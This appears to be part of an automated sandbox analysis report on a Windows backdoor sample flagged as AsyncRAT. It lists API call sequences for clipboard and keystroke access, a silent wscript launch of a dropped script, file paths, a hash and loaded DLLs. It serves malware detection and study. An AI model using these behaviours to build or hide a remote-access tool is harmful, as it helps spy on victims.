Code function: 11_2_004BF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

11_2_004BF55C

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004AA635 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

11_2_004AA635

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004D9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

11_2_004D9FD2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript called in batch mode (surpress errors)

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004B4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

11_2_004B4763

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

11_2_004A1B4D

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040350A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		11_2_004AF20D

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00468017	11_2_00468017
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045E144	11_2_0045E144
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0044E1F0	11_2_0044E1F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047A26E	11_2_0047A26E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004622A2	11_2_004622A2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004422AD	11_2_004422AD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045C624	11_2_0045C624
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047E87F	11_2_0047E87F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004CC8A4	11_2_004CC8A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B2A05	11_2_004B2A05
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00476ADE	11_2_00476ADE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004A8BFF	11_2_004A8BFF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045CD7A	11_2_0045CD7A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0046CE10	11_2_0046CE10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00477159	11_2_00477159
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00449240	11_2_00449240
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004D5311	11_2_004D5311
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004496E0	11_2_004496E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461704	11_2_00461704
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461A76	11_2_00461A76
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00449B60	11_2_00449B60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00467B8B	11_2_00467B8B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461D20	11_2_00461D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00467DBA	11_2_00467DBA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461FE7	11_2_00461FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: String function: 00460DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: String function: 0045FD52 appears 40 times

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: invalid certificate

Source: Northeast.0.dr

Static PE information: No import functions for PE file found

Source: Northeast.0.dr

Static PE information: Data appended to the last section found

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: version.dll	Jump to behavior
